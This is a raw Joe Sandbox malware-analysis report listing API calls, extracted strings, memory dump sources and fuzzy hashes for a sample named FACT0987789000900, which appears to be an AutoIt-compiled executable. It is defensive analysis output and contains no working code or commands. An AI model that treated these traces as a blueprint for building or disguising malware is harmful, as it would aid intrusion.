                                                                                                                  • Part of subcall function 0049B337: _wcscpy.LIBCMT ref: 0049B36F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                • API String ID: 2258743419-1018226102
                                                                                                                • Opcode ID: 6d5d967e014fa78863a2e92df6c5dc4de0a10596722e1eeddb2c1eefe39a2778
                                                                                                                • Instruction ID: 37e43886d0744bd46edd4d823a9b727bb00ca9a60ad087384e15f7531d1523ee
                                                                                                                • Opcode Fuzzy Hash: 6d5d967e014fa78863a2e92df6c5dc4de0a10596722e1eeddb2c1eefe39a2778
                                                                                                                • Instruction Fuzzy Hash: 8912A3715083419FCB14EF25C891AAFBBE4BF99308F00492FF585932A1DB34DA49CB56
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 004FCEFB
                                                                                                                • DestroyWindow.USER32(?,?), ref: 004FCF73
                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 004FCFF4
                                                                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 004FD016
                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004FD025
                                                                                                                • DestroyWindow.USER32(?), ref: 004FD042
                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00490000,00000000), ref: 004FD075
                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004FD094
                                                                                                                • GetDesktopWindow.USER32 ref: 004FD0A9
                                                                                                                • GetWindowRect.USER32(00000000), ref: 004FD0B0
                                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 004FD0C2
                                                                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 004FD0DA
                                                                                                                  • Part of subcall function 004AB526: GetWindowLongW.USER32(?,000000EB), ref: 004AB537
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                                                • String ID: 0$tooltips_class32
                                                                                                                • API String ID: 3877571568-3619404913
                                                                                                                • Opcode ID: 1ff7dd31189cceb988727055d01b022e062164048bbbd4165baf1f55be9b2612
                                                                                                                • Instruction ID: 3fb4ff59ec33a4d5ca0be95b4229e2d561c20be851dc630a16aed26d8adfbec6
                                                                                                                • Opcode Fuzzy Hash: 1ff7dd31189cceb988727055d01b022e062164048bbbd4165baf1f55be9b2612
                                                                                                                • Instruction Fuzzy Hash: CC71A271540309AFD720CF28CC55FB67BE6EB89708F04451EFA8587291DB34E946DB2A
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 004DAB3D
                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 004DAB46
                                                                                                                • VariantClear.OLEAUT32(?), ref: 004DAB52
                                                                                                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 004DAC40
                                                                                                                • __swprintf.LIBCMT ref: 004DAC70
                                                                                                                • VarR8FromDec.OLEAUT32(?,?), ref: 004DAC9C
                                                                                                                • VariantInit.OLEAUT32(?), ref: 004DAD4D
                                                                                                                • SysFreeString.OLEAUT32(00000016), ref: 004DADDF
                                                                                                                • VariantClear.OLEAUT32(?), ref: 004DAE35
                                                                                                                • VariantClear.OLEAUT32(?), ref: 004DAE44
                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 004DAE80
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                • API String ID: 3730832054-3931177956
                                                                                                                • Opcode ID: 9b60011d87118c2ac98e6c7fca3061716bb94b83302be3be3f172919adb48392
                                                                                                                • Instruction ID: 48e8ae831808ba2be6f11efc17429c590474f3ab5010f711edbc2ff3a721af79
                                                                                                                • Opcode Fuzzy Hash: 9b60011d87118c2ac98e6c7fca3061716bb94b83302be3be3f172919adb48392
                                                                                                                • Instruction Fuzzy Hash: C5D1E331A00215EBCB109F56C4A4BAAB7B5FF05700F18845BE5059B381DB7CEC66DBAB
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 004F71FC
                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004F7247
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharMessageSendUpper
                                                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                • API String ID: 3974292440-4258414348
                                                                                                                • Opcode ID: dca0a5bd4ecb40261c2a776eb0d0e4497e79f5ddb6982a84e01abe5575c71498
                                                                                                                • Instruction ID: 078b5a61496824104d8a13f1dace30a9e32d4f50f3566a1c28d7770d9e56a2be
                                                                                                                • Opcode Fuzzy Hash: dca0a5bd4ecb40261c2a776eb0d0e4497e79f5ddb6982a84e01abe5575c71498
                                                                                                                • Instruction Fuzzy Hash: 5D9172342046059BCB04EF25C491A6EBBA1BF55318F00486EFD965B393DB3DED06DB89
                                                                                                                APIs
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 004FE5AB
                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004FBEAF), ref: 004FE607
                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004FE647
                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004FE68C
                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004FE6C3
                                                                                                                • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,004FBEAF), ref: 004FE6CF
                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 004FE6DF
                                                                                                                • DestroyCursor.USER32(?), ref: 004FE6EE
                                                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 004FE70B
                                                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 004FE717
                                                                                                                  • Part of subcall function 004B0FA7: __wcsicmp_l.LIBCMT ref: 004B1030
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                                                                                • String ID: .dll$.exe$.icl
                                                                                                                • API String ID: 3907162815-1154884017
                                                                                                                • Opcode ID: 14b9458044b1ddd209e15856436e62a5324fe48b33b17264c861f1d5c61fd056
                                                                                                                • Instruction ID: 8ac39ed50fb4405497e99c7c46f36c0e009297ac20cd4289114aa2014e02191b
                                                                                                                • Opcode Fuzzy Hash: 14b9458044b1ddd209e15856436e62a5324fe48b33b17264c861f1d5c61fd056
                                                                                                                • Instruction Fuzzy Hash: 9D61E171500219BAEB24DF65CC46FFE7BB8BB18716F108116FA11D61E0EBB89980DB64
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0049936C: __swprintf.LIBCMT ref: 004993AB
                                                                                                                  • Part of subcall function 0049936C: __itow.LIBCMT ref: 004993DF
                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 004DD292
                                                                                                                • GetDriveTypeW.KERNEL32 ref: 004DD2DF
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004DD327
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004DD35E
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004DD38C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                • API String ID: 1148790751-4113822522
                                                                                                                • Opcode ID: 617bea89b1ab56ed3f78056123c195f098256d2703b66016e55a861a19e8c918
                                                                                                                • Instruction ID: 7055d95516f9235826f303dce7048ef8f6632eaeb3b9d2f4cc08c4f6875e9cd8
                                                                                                                • Opcode Fuzzy Hash: 617bea89b1ab56ed3f78056123c195f098256d2703b66016e55a861a19e8c918
                                                                                                                • Instruction Fuzzy Hash: 75515C71504304AFC700EF26C99196EBBE4FF98718F10486EF89567261DB35EE06CB96
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00503973,00000016,0000138C,00000016,?,00000016,0052DDB4,00000000,?), ref: 004D26F1
                                                                                                                • LoadStringW.USER32(00000000,?,00503973,00000016), ref: 004D26FA
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00503973,00000016,0000138C,00000016,?,00000016,0052DDB4,00000000,?,00000016), ref: 004D271C
                                                                                                                • LoadStringW.USER32(00000000,?,00503973,00000016), ref: 004D271F
                                                                                                                • __swprintf.LIBCMT ref: 004D276F
                                                                                                                • __swprintf.LIBCMT ref: 004D2780
                                                                                                                • _wprintf.LIBCMT ref: 004D2829
                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004D2840
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                • API String ID: 618562835-2268648507
                                                                                                                • Opcode ID: 7280786871234accd3a5c963860726ba5be0dfd6fb6dfef24948d7fd9d032d0d
                                                                                                                • Instruction ID: 1b9e20ec14f17f97592217de03ae11ba9b24932f1bf90255110dcdbfc77adbf9
                                                                                                                • Opcode Fuzzy Hash: 7280786871234accd3a5c963860726ba5be0dfd6fb6dfef24948d7fd9d032d0d
                                                                                                                • Instruction Fuzzy Hash: 0C413272800218BACF15FBD1DE97DEEBB78AF15348F10006BF50176092EA686F49DB65
                                                                                                                APIs
                                                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 004DD0D8
                                                                                                                • __swprintf.LIBCMT ref: 004DD0FA
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 004DD137
                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 004DD15C
                                                                                                                • _memset.LIBCMT ref: 004DD17B
                                                                                                                • _wcsncpy.LIBCMT ref: 004DD1B7
                                                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 004DD1EC
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004DD1F7
                                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 004DD200
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004DD20A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                • String ID: :$\$\??\%s
                                                                                                                • API String ID: 2733774712-3457252023
                                                                                                                • Opcode ID: e95ddc01204ed7aa266655264b5bef7375312f40a905a0d0b92690c99955764a
                                                                                                                • Instruction ID: 42a82028476a5af6b2248f7c19ca0590d766efe1904d71793df339dc096c4075
                                                                                                                • Opcode Fuzzy Hash: e95ddc01204ed7aa266655264b5bef7375312f40a905a0d0b92690c99955764a
                                                                                                                • Instruction Fuzzy Hash: 08318F76900109ABDB219FA1DC49FEF37BCEF89704F1080ABF519D2260E77496459B38
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,004FBEF4,?,?), ref: 004FE754
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,004FBEF4,?,?,00000000,?), ref: 004FE76B
                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,004FBEF4,?,?,00000000,?), ref: 004FE776
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,004FBEF4,?,?,00000000,?), ref: 004FE783
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004FE78C
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,004FBEF4,?,?,00000000,?), ref: 004FE79B
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004FE7A4
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,004FBEF4,?,?,00000000,?), ref: 004FE7AB
                                                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004FE7BC
                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,0051D9BC,?), ref: 004FE7D5
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004FE7E5
                                                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 004FE809
                                                                                                                • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 004FE834
                                                                                                                • DeleteObject.GDI32(00000000), ref: 004FE85C
                                                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004FE872
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3840717409-0
                                                                                                                • Opcode ID: 7fbc045677e2e1595967512d692fd3553f2222510736568753593b3d4955d0a4
                                                                                                                • Instruction ID: 7e35003c11c91ec46b1bec3179a4983f2767360034af5af7fcd083c72b2f9752
                                                                                                                • Opcode Fuzzy Hash: 7fbc045677e2e1595967512d692fd3553f2222510736568753593b3d4955d0a4
                                                                                                                • Instruction Fuzzy Hash: 21416975600208FFDB11AF66CC88EAB7BB8EF99711F108459F916D7260D7349D45EB20
                                                                                                                APIs
                                                                                                                • __wsplitpath.LIBCMT ref: 004E076F
                                                                                                                • _wcscat.LIBCMT ref: 004E0787
                                                                                                                • _wcscat.LIBCMT ref: 004E0799
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004E07AE
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004E07C2
                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 004E07DA
                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 004E07F4
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004E0806
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 34673085-438819550
                                                                                                                • Opcode ID: 3ada25c5f119b12118f9930e1d3c48c167e99070194a56b004198bb632f8a436
                                                                                                                • Instruction ID: 2e56e1139e03693fba5dd57c467a2eeff787bf8919db2b223c3998896a894151
                                                                                                                • Opcode Fuzzy Hash: 3ada25c5f119b12118f9930e1d3c48c167e99070194a56b004198bb632f8a436
                                                                                                                • Instruction Fuzzy Hash: 0081C3715043819FCB24EF26C444AAFB7E8BB98305F14882FF895C7350E778D9858B5A
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004CABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004CABD7
                                                                                                                  • Part of subcall function 004CABBB: GetLastError.KERNEL32(?,004CA69F,?,?,?), ref: 004CABE1
                                                                                                                  • Part of subcall function 004CABBB: GetProcessHeap.KERNEL32(00000008,?,?,004CA69F,?,?,?), ref: 004CABF0
                                                                                                                  • Part of subcall function 004CABBB: RtlAllocateHeap.NTDLL(00000000,?,004CA69F), ref: 004CABF7
                                                                                                                  • Part of subcall function 004CABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 004CAC0E
                                                                                                                  • Part of subcall function 004CAC56: GetProcessHeap.KERNEL32(00000008,004CA6B5,00000000,00000000,?,004CA6B5,?), ref: 004CAC62
                                                                                                                  • Part of subcall function 004CAC56: RtlAllocateHeap.NTDLL(00000000,?,004CA6B5), ref: 004CAC69
                                                                                                                  • Part of subcall function 004CAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,004CA6B5,?), ref: 004CAC7A
                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004CA8CB
                                                                                                                • _memset.LIBCMT ref: 004CA8E0
                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004CA8FF
                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 004CA910
                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 004CA94D
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004CA969
                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 004CA986
                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 004CA995
                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 004CA99C
                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004CA9BD
                                                                                                                • CopySid.ADVAPI32(00000000), ref: 004CA9C4
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004CA9F5
                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004CAA1B
                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004CAA2F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
